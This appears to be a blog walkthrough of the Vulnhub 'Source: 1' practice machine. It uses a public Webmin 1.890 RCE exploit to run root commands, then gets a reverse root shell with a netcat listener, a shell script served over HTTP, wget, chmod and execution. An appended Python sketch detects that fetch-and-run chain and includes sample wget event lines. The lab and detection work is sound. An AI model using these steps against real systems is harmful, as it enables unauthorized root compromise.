dorian5.medium.com

Vulnhub Source: 1 Walkthrough

Jeff

Today we are going to do a walkthrough of Source: 1 from Vulnhub.com. After getting the VM set up in VMware Player, we start with our standard nmap scans.

nmap

Port tcp/10000 is identified as MiniServ 1.890, so even before checking out the website my first thought was to search for vulnerabilities. A Google search of “miniserv 1.890 exploit” reveals a link for a Remote Code Execution Exploit: https://medium.com/@foxsin34/webmin-1-890-exploit-unauthorized-rce-cve-2019-15107-23e4d5a9c3b4

Download the Python script from the GitHub site and give it a try:

that was easy

Wow, the RCE exploit has us executing commands as root! At this point, we can grab the root flag and call it a day.

No spoilers here

However, let’s go further and try to get a root shell. I tried to execute a number of root shells directly via the RCE, including nc, perl, python, etc., but had no luck. Then I attempted to upload several shells and finally got a hit with the NetCat OpenBSD shell from PayloadsAllTheThings. Keep this one in your toolbelt, as it has worked for me several times lately when the more common netcat, python, etc. shells haven’t.

Don’t forget to first launch your listener with “nc -nvlp 8001”. On my attacking machine, I created a file shell.sh with the NetCat OpenBSD shell code.

one-liner

Launch SimpleHTTPServer with “sudo python -m SimpleHTTPServer 80” and then upload the shell script to the target with wget.

Make the script executable.

“chmod +x shell.sh” didn’t work

Then run the script.

We get a root shell!
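From the defender's side, the download, chmod, run sequence above leaves a distinctive trail in process telemetry: the Webmin server process suddenly has child processes fetching and executing a file. The following detection sketch is an added example, not part of the original walkthrough; the event tuple format, the sample events, the `miniserv.pl` path, the 192.0.2.x addresses and all function names are assumptions.

```python
import posixpath
import shlex
from urllib.parse import urlparse

# Constructed events: (timestamp, pid, ppid, command line). Format is an assumption.
SAMPLE_EVENTS = [
    (100, 900, 1, "/usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf"),
    (101, 1200, 900, "sh -c id"),
    (110, 1210, 900, "sh -c wget http://192.0.2.10/shell.sh"),
    (120, 1220, 900, "sh -c chmod 755 shell.sh"),
    (130, 1230, 900, "sh -c ./shell.sh"),
    (131, 1231, 1230, "/bin/sh ./shell.sh"),
    (140, 2000, 1, "/usr/sbin/cron -f"),
    (141, 2001, 2000, "wget http://192.0.2.20/report.csv"),
]
SHELLS, FETCHERS = {"sh", "bash", "dash"}, {"wget", "curl"}

def under_server(pid, parents, roots):
    for _ in range(len(parents) + 1):  # bounded walk up the process tree
        if pid in roots:
            return True
        pid = parents.get(pid)
    return False

def detect_staged_payload(events, server_marker="miniserv.pl"):
    """Flag download -> chmod -> execute of the same file beneath the web server."""
    parents, roots, fetched, alerts = {}, set(), set(), {}
    for ts, pid, ppid, cmd in events:
        parents[pid] = ppid
        if server_marker in cmd:  # the server process itself anchors the tree
            roots.add(pid)
            continue
        argv = shlex.split(cmd)
        if argv and posixpath.basename(argv[0]) in SHELLS and argv[1:2] == ["-c"]:
            argv = shlex.split(" ".join(argv[2:]))  # unwrap "sh -c <command>"
        if not argv or not under_server(ppid, parents, roots):
            continue
        tool = posixpath.basename(argv[0])
        names = [posixpath.basename(urlparse(a).path if "://" in a else a) for a in argv]
        if tool in FETCHERS:
            hits = [("download", n) for a, n in zip(argv, names) if "://" in a and n]
            fetched.update(n for _, n in hits)
        else:
            stage = "chmod" if tool == "chmod" else "execute"
            targets = names[1:] if tool in SHELLS | {"chmod"} else names[:1]
            hits = [(stage, n) for n in targets if n in fetched]
        for hit in hits:
            alerts.setdefault(hit, ts)  # keep the first sighting of each (stage, file)
    return [(ts, stage, name) for (stage, name), ts in alerts.items()]
```

On the constructed events, the three stages for `shell.sh` are reported once each, while the unrelated `wget` run by cron is ignored because it does not descend from the server process.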

Thanks for reading. Did you get a shell another way? Leave me a comment with how you did it.